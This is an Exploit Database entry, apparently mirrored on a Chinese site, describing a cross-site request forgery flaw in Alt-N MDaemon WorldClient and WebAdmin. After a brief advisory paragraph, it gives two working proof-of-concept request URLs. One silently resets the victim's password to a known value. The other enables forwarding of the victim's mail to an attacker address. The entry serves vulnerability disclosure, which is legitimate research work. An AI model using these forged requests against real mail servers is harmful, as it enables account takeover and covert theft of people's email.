Alt-N MDaemon WorldClient And WebAdmin – Cross-Site Request Forgery

• Exploit Database
• 52 阅读

• 作者： QSecure
  日期： 2013-02-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38325/

• source: https://www.securityfocus.com/bid/58076/info
  
  MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability.
  
  Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. 
  
  http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n
  
  http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com